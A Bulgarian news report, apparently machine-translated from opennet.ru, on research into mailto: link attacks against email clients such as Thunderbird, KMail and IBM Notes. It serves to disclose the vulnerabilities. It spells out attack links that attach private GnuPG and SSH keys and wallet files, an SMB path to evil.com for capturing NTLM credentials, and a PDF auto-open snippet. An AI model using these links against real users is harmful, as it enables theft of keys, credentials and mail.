АтакуванС Π½Π° ΠΏΠΎΡ‚Ρ€Π΅Π±ΠΈΡ‚Π΅Π»ΠΈ Π½Π° ΠΈΠΌΠ΅ΠΉΠ» ΠΊΠ»ΠΈΠ΅Π½Ρ‚ Ρ‡Ρ€Π΅Π· Π²Ρ€ΡŠΠ·ΠΊΠΈ β€žmailto:β€œ.

Π˜Π·ΡΠ»Π΅Π΄ΠΎΠ²Π°Ρ‚Π΅Π»ΠΈ ΠΎΡ‚ Рурския унивСрситСт Π² Π‘ΠΎΡ…ΡƒΠΌ (ГСрмания) Π°Π½Π°Π»ΠΈΠ·ΠΈΡ€Π°Π½ΠΈ (PDF) ΠΏΠΎΠ²Π΅Π΄Π΅Π½ΠΈΠ΅ Π½Π° пощСнски ΠΊΠ»ΠΈΠ΅Π½Ρ‚ΠΈ ΠΏΡ€ΠΈ ΠΎΠ±Ρ€Π°Π±ΠΎΡ‚ΠΊΠ° Π½Π° Π²Ρ€ΡŠΠ·ΠΊΠΈ β€žmailto:β€œ с Ρ€Π°Π·ΡˆΠΈΡ€Π΅Π½ΠΈ ΠΏΠ°Ρ€Π°ΠΌΠ΅Ρ‚Ρ€ΠΈ. ΠŸΠ΅Ρ‚ ΠΎΡ‚ двадСсСттС изслСдвани ΠΈΠΌΠ΅ΠΉΠ» ΠΊΠ»ΠΈΠ΅Π½Ρ‚Π° бяха уязвими Π½Π° Π°Ρ‚Π°ΠΊΠ°, която ΠΌΠ°Π½ΠΈΠΏΡƒΠ»ΠΈΡ€Π° подмяната Π½Π° рСсурс с ΠΏΠΎΠΌΠΎΡ‰Ρ‚Π° Π½Π° ΠΏΠ°Ρ€Π°ΠΌΠ΅Ρ‚ΡŠΡ€Π° β€žΠΏΡ€ΠΈΠΊΠ°Ρ‡Π²Π°Π½Π΅β€œ. Π”ΠΎΠΏΡŠΠ»Π½ΠΈΡ‚Π΅Π»Π½ΠΈ ΡˆΠ΅ΡΡ‚ ΠΈΠΌΠ΅ΠΉΠ» ΠΊΠ»ΠΈΠ΅Π½Ρ‚Π° бяха уязвими Π½Π° Π°Ρ‚Π°ΠΊΠ° Π·Π° подмяна Π½Π° PGP ΠΈ S/MIME ΠΊΠ»ΡŽΡ‡, Π° Ρ‚Ρ€ΠΈ ΠΊΠ»ΠΈΠ΅Π½Ρ‚Π° бяха уязвими Π½Π° Π°Ρ‚Π°ΠΊΠ° Π·Π° ΠΈΠ·Π²Π»ΠΈΡ‡Π°Π½Π΅ Π½Π° ΡΡŠΠ΄ΡŠΡ€ΠΆΠ°Π½ΠΈΠ΅Ρ‚ΠΎ Π½Π° ΠΊΡ€ΠΈΠΏΡ‚ΠΈΡ€Π°Π½ΠΈ ΡΡŠΠΎΠ±Ρ‰Π΅Π½ΠΈΡ.

Π’Ρ€ΡŠΠ·ΠΊΠΈ Β«mailto:"сС ΠΈΠ·ΠΏΠΎΠ»Π·Π²Π°Ρ‚ Π·Π° Π°Π²Ρ‚ΠΎΠΌΠ°Ρ‚ΠΈΠ·ΠΈΡ€Π°Π½Π΅ Π½Π° отварянСто Π½Π° ΠΈΠΌΠ΅ΠΉΠ» ΠΊΠ»ΠΈΠ΅Π½Ρ‚ с Ρ†Π΅Π» написванС Π½Π° писмо Π΄ΠΎ адрСсата, посочСн Π² Π»ΠΈΠ½ΠΊΠ°. Π’ допълнСниС към адрСса ΠΌΠΎΠΆΠ΅Ρ‚Π΅ Π΄Π° посочитС Π΄ΠΎΠΏΡŠΠ»Π½ΠΈΡ‚Π΅Π»Π½ΠΈ ΠΏΠ°Ρ€Π°ΠΌΠ΅Ρ‚Ρ€ΠΈ ΠΊΠ°Ρ‚ΠΎ част ΠΎΡ‚ Π²Ρ€ΡŠΠ·ΠΊΠ°Ρ‚Π°, ΠΊΠ°Ρ‚ΠΎ Ρ‚Π΅ΠΌΠ° Π½Π° писмото ΠΈ шаблон Π·Π° Ρ‚ΠΈΠΏΠΈΡ‡Π½ΠΎ ΡΡŠΠ΄ΡŠΡ€ΠΆΠ°Π½ΠΈΠ΅. ΠŸΡ€Π΅Π΄Π»ΠΎΠΆΠ΅Π½Π°Ρ‚Π° Π°Ρ‚Π°ΠΊΠ° ΠΌΠ°Π½ΠΈΠΏΡƒΠ»ΠΈΡ€Π° ΠΏΠ°Ρ€Π°ΠΌΠ΅Ρ‚ΡŠΡ€Π° β€žΠΏΡ€ΠΈΠΊΠ°Ρ‡Π²Π°Π½Π΅β€œ, ΠΊΠΎΠΉΡ‚ΠΎ Π²ΠΈ позволява Π΄Π° ΠΏΡ€ΠΈΠΊΠ°Ρ‡ΠΈΡ‚Π΅ ΠΏΡ€ΠΈΠΊΠ°Ρ‡Π΅Π½ Ρ„Π°ΠΉΠ» към Π³Π΅Π½Π΅Ρ€ΠΈΡ€Π°Π½ΠΎΡ‚ΠΎ ΡΡŠΠΎΠ±Ρ‰Π΅Π½ΠΈΠ΅.

ΠŸΠΎΡ‰Π΅Π½ΡΠΊΠΈΡ‚Π΅ ΠΊΠ»ΠΈΠ΅Π½Ρ‚ΠΈ Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) ΠΈ Pegasus Mail бяха уязвими Π½Π° Ρ‚Ρ€ΠΈΠ²ΠΈΠ°Π»Π½Π° Π°Ρ‚Π°ΠΊΠ°, която Π²ΠΈ позволява Π°Π²Ρ‚ΠΎΠΌΠ°Ρ‚ΠΈΡ‡Π½ΠΎ Π΄Π° ΠΏΡ€ΠΈΠΊΠ°Ρ‡Π²Π°Ρ‚Π΅ всСки Π»ΠΎΠΊΠ°Π»Π΅Π½ Ρ„Π°ΠΉΠ», посочСн Ρ‡Ρ€Π΅Π· Π²Ρ€ΡŠΠ·ΠΊΠ° ΠΊΠ°Ρ‚ΠΎ β€žmailto:?attach=path_to_fileβ€œ. Π€Π°ΠΉΠ»ΡŠΡ‚ Π΅ ΠΏΡ€ΠΈΠΊΠ°Ρ‡Π΅Π½ Π±Π΅Π· ΠΏΠΎΠΊΠ°Π·Π²Π°Π½Π΅ Π½Π° ΠΏΡ€Π΅Π΄ΡƒΠΏΡ€Π΅ΠΆΠ΄Π΅Π½ΠΈΠ΅, Ρ‚Π°ΠΊΠ° Ρ‡Π΅ Π±Π΅Π· спСциално Π²Π½ΠΈΠΌΠ°Π½ΠΈΠ΅ потрСбитСлят ΠΌΠΎΠΆΠ΅ Π΄Π° Π½Π΅ Π·Π°Π±Π΅Π»Π΅ΠΆΠΈ, Ρ‡Π΅ писмото Ρ‰Π΅ бъдС ΠΈΠ·ΠΏΡ€Π°Ρ‚Π΅Π½ΠΎ с ΠΏΡ€ΠΈΠΊΠ°Ρ‡Π΅Π½ Ρ„Π°ΠΉΠ».

НапримСр, ΠΊΠ°Ρ‚ΠΎ ΠΈΠ·ΠΏΠΎΠ»Π·Π²Π°Ρ‚Π΅ Π²Ρ€ΡŠΠ·ΠΊΠ° ΠΊΠ°Ρ‚ΠΎ β€žmailto:[ΠΈΠΌΠ΅ΠΉΠ» Π·Π°Ρ‰ΠΈΡ‚Π΅Π½]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" ΠΌΠΎΠΆΠ΅Ρ‚Π΅ Π΄Π° Π²ΠΌΡŠΠΊΠ½Π΅Ρ‚Π΅ Π»ΠΈΡ‡Π½ΠΈ ΠΊΠ»ΡŽΡ‡ΠΎΠ²Π΅ ΠΎΡ‚ GnuPG Π² писмото. ΠœΠΎΠΆΠ΅Ρ‚Π΅ ΡΡŠΡ‰ΠΎ Π΄Π° ΠΈΠ·ΠΏΡ€Π°Ρ‚ΠΈΡ‚Π΅ ΡΡŠΠ΄ΡŠΡ€ΠΆΠ°Π½ΠΈΠ΅Ρ‚ΠΎ Π½Π° ΠΊΡ€ΠΈΠΏΡ‚ΠΎ ΠΏΠΎΡ€Ρ‚Ρ„Π΅ΠΉΠ»ΠΈ (~/.bitcoin/wallet.dat), SSH ΠΊΠ»ΡŽΡ‡ΠΎΠ²Π΅ (~/.ssh/id_rsa) ΠΈ всички Ρ„Π°ΠΉΠ»ΠΎΠ²Π΅, Π΄ΠΎΡΡ‚ΡŠΠΏΠ½ΠΈ Π·Π° потрСбитСля. ОсвСн Ρ‚ΠΎΠ²Π° Thunderbird Π²ΠΈ позволява Π΄Π° ΠΏΡ€ΠΈΠΊΠ°Ρ‡Π²Π°Ρ‚Π΅ Π³Ρ€ΡƒΠΏΠΈ ΠΎΡ‚ Ρ„Π°ΠΉΠ»ΠΎΠ²Π΅ ΠΏΠΎ маска, ΠΊΠ°Ρ‚ΠΎ ΠΈΠ·ΠΏΠΎΠ»Π·Π²Π°Ρ‚Π΅ конструкции ΠΊΠ°Ρ‚ΠΎ β€žattach=/tmp/*.txtβ€œ.

Π’ допълнСниС към Π»ΠΎΠΊΠ°Π»Π½ΠΈΡ‚Π΅ Ρ„Π°ΠΉΠ»ΠΎΠ²Π΅, някои ΠΈΠΌΠ΅ΠΉΠ» ΠΊΠ»ΠΈΠ΅Π½Ρ‚ΠΈ ΠΎΠ±Ρ€Π°Π±ΠΎΡ‚Π²Π°Ρ‚ Π²Ρ€ΡŠΠ·ΠΊΠΈ към ΠΌΡ€Π΅ΠΆΠΎΠ²ΠΎ Ρ…Ρ€Π°Π½ΠΈΠ»ΠΈΡ‰Π΅ ΠΈ ΠΏΡŠΡ‚ΠΈΡ‰Π° Π² IMAP ΡΡŠΡ€Π²ΡŠΡ€Π°. По-спСциално, IBM Notes Π²ΠΈ позволява Π΄Π° ΠΏΡ€Π΅Ρ…Π²ΡŠΡ€Π»ΠΈΡ‚Π΅ Ρ„Π°ΠΉΠ» ΠΎΡ‚ ΠΌΡ€Π΅ΠΆΠΎΠ²Π° дирСктория, ΠΊΠΎΠ³Π°Ρ‚ΠΎ ΠΎΠ±Ρ€Π°Π±ΠΎΡ‚Π²Π°Ρ‚Π΅ Π²Ρ€ΡŠΠ·ΠΊΠΈ ΠΊΠ°Ρ‚ΠΎ β€žattach=\\evil.com\dummyfileβ€œ, ΠΊΠ°ΠΊΡ‚ΠΎ ΠΈ Π΄Π° ΠΏΡ€ΠΈΡ…Π²Π°Ρ‰Π°Ρ‚Π΅ NTLM ΠΏΠ°Ρ€Π°ΠΌΠ΅Ρ‚Ρ€ΠΈ Π·Π° удостовСряванС Ρ‡Ρ€Π΅Π· ΠΈΠ·ΠΏΡ€Π°Ρ‰Π°Π½Π΅ Π½Π° Π²Ρ€ΡŠΠ·ΠΊΠ° към SMB ΡΡŠΡ€Π²ΡŠΡ€, ΠΊΠΎΠ½Ρ‚Ρ€ΠΎΠ»ΠΈΡ€Π°Π½ ΠΎΡ‚ нападатСля (заявката Ρ‰Π΅ бъдС ΠΈΠ·ΠΏΡ€Π°Ρ‚Π΅Π½Π° с тСкущия ΠΏΠΎΡ‚Ρ€Π΅Π±ΠΈΡ‚Π΅Π» Π½Π° ΠΏΠ°Ρ€Π°ΠΌΠ΅Ρ‚Ρ€ΠΈΡ‚Π΅ Π·Π° удостовСряванС).

Thunderbird ΡƒΡΠΏΠ΅ΡˆΠ½ΠΎ ΠΎΠ±Ρ€Π°Π±ΠΎΡ‚Π²Π° заявки ΠΊΠ°Ρ‚ΠΎ β€œattach=imap:///fetch>UID>/INBOX>1/”, ΠΊΠΎΠΈΡ‚ΠΎ Π²ΠΈ позволяват Π΄Π° ΠΏΡ€ΠΈΠΊΠ°Ρ‡Π²Π°Ρ‚Π΅ ΡΡŠΠ΄ΡŠΡ€ΠΆΠ°Π½ΠΈΠ΅ ΠΎΡ‚ ΠΏΠ°ΠΏΠΊΠΈ Π½Π° IMAP ΡΡŠΡ€Π²ΡŠΡ€Π°. Π’ ΡΡŠΡ‰ΠΎΡ‚ΠΎ Π²Ρ€Π΅ΠΌΠ΅ ΡΡŠΠΎΠ±Ρ‰Π΅Π½ΠΈΡΡ‚Π°, ΠΈΠ·Π²Π»Π΅Ρ‡Π΅Π½ΠΈ ΠΎΡ‚ IMAP, ΠΊΡ€ΠΈΠΏΡ‚ΠΈΡ€Π°Π½ΠΈ Ρ‡Ρ€Π΅Π· OpenPGP ΠΈ S/MIME, сС Π΄Π΅ΡˆΠΈΡ„Ρ€ΠΈΡ€Π°Ρ‚ Π°Π²Ρ‚ΠΎΠΌΠ°Ρ‚ΠΈΡ‡Π½ΠΎ ΠΎΡ‚ пощСнския ΠΊΠ»ΠΈΠ΅Π½Ρ‚ ΠΏΡ€Π΅Π΄ΠΈ ΠΈΠ·ΠΏΡ€Π°Ρ‰Π°Π½Π΅. Π Π°Π·Ρ€Π°Π±ΠΎΡ‚Ρ‡ΠΈΡ†ΠΈΡ‚Π΅ Π½Π° Thunderbird бяха ΡƒΠ²Π΅Π΄ΠΎΠΌΠ΅Π½ Π·Π° ΠΏΡ€ΠΎΠ±Π»Π΅ΠΌΠ° ΠΏΡ€Π΅Π· Ρ„Π΅Π²Ρ€ΡƒΠ°Ρ€ΠΈ ΠΈ Π² Π±Ρ€ Thunderbird 78 ΠΏΡ€ΠΎΠ±Π»Π΅ΠΌΡŠΡ‚ Π²Π΅Ρ‡Π΅ Π΅ отстранСн (ΠΊΠ»ΠΎΠ½ΠΎΠ²Π΅ 52, 60 ΠΈ 68 Π½Π° Thunderbird остават уязвими).

Π‘Ρ‚Π°Ρ€ΠΈΡ‚Π΅ вСрсии Π½Π° Thunderbird ΡΡŠΡ‰ΠΎ бяха уязвими към Π΄Π²Π° Π΄Ρ€ΡƒΠ³ΠΈ Π²Π°Ρ€ΠΈΠ°Π½Ρ‚Π° Π½Π° Π°Ρ‚Π°ΠΊΠ° Π½Π° PGP ΠΈ S/MIME, ΠΏΡ€Π΅Π΄Π»ΠΎΠΆΠ΅Π½ΠΈ ΠΎΡ‚ изслСдоватСлитС. По-спСциално, Thunderbird, ΠΊΠ°ΠΊΡ‚ΠΎ ΠΈ OutLook, PostBox, eM Client, MailMate ΠΈ R2Mail2, бяха ΠΎΠ±Π΅ΠΊΡ‚ Π½Π° Π°Ρ‚Π°ΠΊΠ° Π·Π° подмяна Π½Π° ΠΊΠ»ΡŽΡ‡, ΠΏΡ€ΠΈΡ‡ΠΈΠ½Π΅Π½Π° ΠΎΡ‚ Ρ„Π°ΠΊΡ‚Π°, Ρ‡Π΅ пощСнският ΠΊΠ»ΠΈΠ΅Π½Ρ‚ Π°Π²Ρ‚ΠΎΠΌΠ°Ρ‚ΠΈΡ‡Π½ΠΎ ΠΈΠΌΠΏΠΎΡ€Ρ‚ΠΈΡ€Π° ΠΈ инсталира Π½ΠΎΠ²ΠΈ сСртификати, ΠΏΡ€Π΅Π΄Π°Π²Π°Π½ΠΈ Π² S/MIME ΡΡŠΠΎΠ±Ρ‰Π΅Π½ΠΈΡ, ΠΊΠΎΠ΅Ρ‚ΠΎ позволява нападатСлят Π΄Π° ΠΎΡ€Π³Π°Π½ΠΈΠ·ΠΈΡ€Π° подмяна Π½Π° Π²Π΅Ρ‡Π΅ ΡΡŠΡ…Ρ€Π°Π½Π΅Π½ΠΈ ΠΎΡ‚ потрСбитСля ΠΏΡƒΠ±Π»ΠΈΡ‡Π½ΠΈ ΠΊΠ»ΡŽΡ‡ΠΎΠ²Π΅.

Π’Ρ‚ΠΎΡ€Π°Ρ‚Π° Π°Ρ‚Π°ΠΊΠ°, Π½Π° която са ΠΏΠΎΠ΄Π°Ρ‚Π»ΠΈΠ²ΠΈ Thunderbird, PostBox ΠΈ MailMate, ΠΌΠ°Π½ΠΈΠΏΡƒΠ»ΠΈΡ€Π° характСристикитС Π½Π° ΠΌΠ΅Ρ…Π°Π½ΠΈΠ·ΠΌΠ° Π·Π° Π°Π²Ρ‚ΠΎΠΌΠ°Ρ‚ΠΈΡ‡Π½ΠΎ Π·Π°ΠΏΠ°Π·Π²Π°Π½Π΅ Π½Π° Ρ‡Π΅Ρ€Π½ΠΎΠ²ΠΈ Π½Π° ΡΡŠΠΎΠ±Ρ‰Π΅Π½ΠΈΡ ΠΈ позволява, ΠΈΠ·ΠΏΠΎΠ»Π·Π²Π°ΠΉΠΊΠΈ ΠΏΠ°Ρ€Π°ΠΌΠ΅Ρ‚Ρ€ΠΈ Π½Π° mailto, Π΄Π° ΠΈΠ½ΠΈΡ†ΠΈΠΈΡ€Π° Π΄Π΅ΠΊΡ€ΠΈΠΏΡ‚ΠΈΡ€Π°Π½Π΅ Π½Π° ΠΊΡ€ΠΈΠΏΡ‚ΠΈΡ€Π°Π½ΠΈ ΡΡŠΠΎΠ±Ρ‰Π΅Π½ΠΈΡ ΠΈΠ»ΠΈ добавянС Π½Π° Ρ†ΠΈΡ„Ρ€ΠΎΠ² подпис Π·Π° ΠΏΡ€ΠΎΠΈΠ·Π²ΠΎΠ»Π½ΠΈ ΡΡŠΠΎΠ±Ρ‰Π΅Π½ΠΈΡ, с послСдващо ΠΏΡ€Π΅Π΄Π°Π²Π°Π½Π΅ Π½Π° Ρ€Π΅Π·ΡƒΠ»Ρ‚Π°Ρ‚Π° към IMAP ΡΡŠΡ€Π²ΡŠΡ€Π° Π½Π° нападатСля. ΠŸΡ€ΠΈ Ρ‚Π°Π·ΠΈ Π°Ρ‚Π°ΠΊΠ° ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Π½ΠΈΡΡ‚ тСкст сС ΠΏΡ€Π΅Π΄Π°Π²Π° Ρ‡Ρ€Π΅Π· ΠΏΠ°Ρ€Π°ΠΌΠ΅Ρ‚ΡŠΡ€Π° β€žΡ‚ΡΠ»ΠΎβ€œ, Π° Ρ‚Π°Π³ΡŠΡ‚ β€žΠΌΠ΅Ρ‚Π° ΠΎΠΏΡ€Π΅ΡΠ½ΡΠ²Π°Π½Π΅β€œ сС ΠΈΠ·ΠΏΠΎΠ»Π·Π²Π° Π·Π° ΠΈΠ½ΠΈΡ†ΠΈΠΈΡ€Π°Π½Π΅ Π½Π° ΠΏΠΎΠ²ΠΈΠΊΠ²Π°Π½Π΅ към IMAP ΡΡŠΡ€Π²ΡŠΡ€Π° Π½Π° атакуващия. НапримСр: ' '

Π—Π° Π°Π²Ρ‚ΠΎΠΌΠ°Ρ‚ΠΈΡ‡Π½ΠΎ ΠΎΠ±Ρ€Π°Π±ΠΎΡ‚Π²Π°Π½Π΅ Π½Π° Π²Ρ€ΡŠΠ·ΠΊΠΈ β€žmailto:β€œ Π±Π΅Π· намСса Π½Π° потрСбитСля ΠΌΠΎΠ³Π°Ρ‚ Π΄Π° сС ΠΈΠ·ΠΏΠΎΠ»Π·Π²Π°Ρ‚ спСциално ΠΏΡ€ΠΎΠ΅ΠΊΡ‚ΠΈΡ€Π°Π½ΠΈ PDF Π΄ΠΎΠΊΡƒΠΌΠ΅Π½Ρ‚ΠΈ - дСйствиСто OpenAction Π² PDF Π²ΠΈ позволява Π°Π²Ρ‚ΠΎΠΌΠ°Ρ‚ΠΈΡ‡Π½ΠΎ Π΄Π° стартиратС ΠΌΠ°Π½ΠΈΠΏΡƒΠ»Π°Ρ‚ΠΎΡ€Π° Π½Π° mailto ΠΏΡ€ΠΈ отварянС Π½Π° Π΄ΠΎΠΊΡƒΠΌΠ΅Π½Ρ‚:

%PDF-1.5
1 0 ΠΎΠ±
<< /Π’ΠΈΠΏ /ΠšΠ°Ρ‚Π°Π»ΠΎΠ³ /OpenAction [2 0 R] >>
endobj

2 0 ΠΎΠ±
<< /Π’ΠΈΠΏ /ДСйствиС /S /URI/URI (mailto:?body=β€”β€”ΠΠΠ§ΠΠ›Πž НА PGP Π‘ΠͺΠžΠ‘Π©Π•ΠΠ˜Π•β€”β€”[…])>>
endobj

АтакуванС Π½Π° ΠΏΠΎΡ‚Ρ€Π΅Π±ΠΈΡ‚Π΅Π»ΠΈ Π½Π° ΠΈΠΌΠ΅ΠΉΠ» ΠΊΠ»ΠΈΠ΅Π½Ρ‚ Ρ‡Ρ€Π΅Π· Π²Ρ€ΡŠΠ·ΠΊΠΈ "mailto:".

Π˜Π·Ρ‚ΠΎΡ‡Π½ΠΈΠΊ: opennet.ru

ДобавянС Π½Π° Π½ΠΎΠ² ΠΊΠΎΠΌΠ΅Π½Ρ‚Π°Ρ€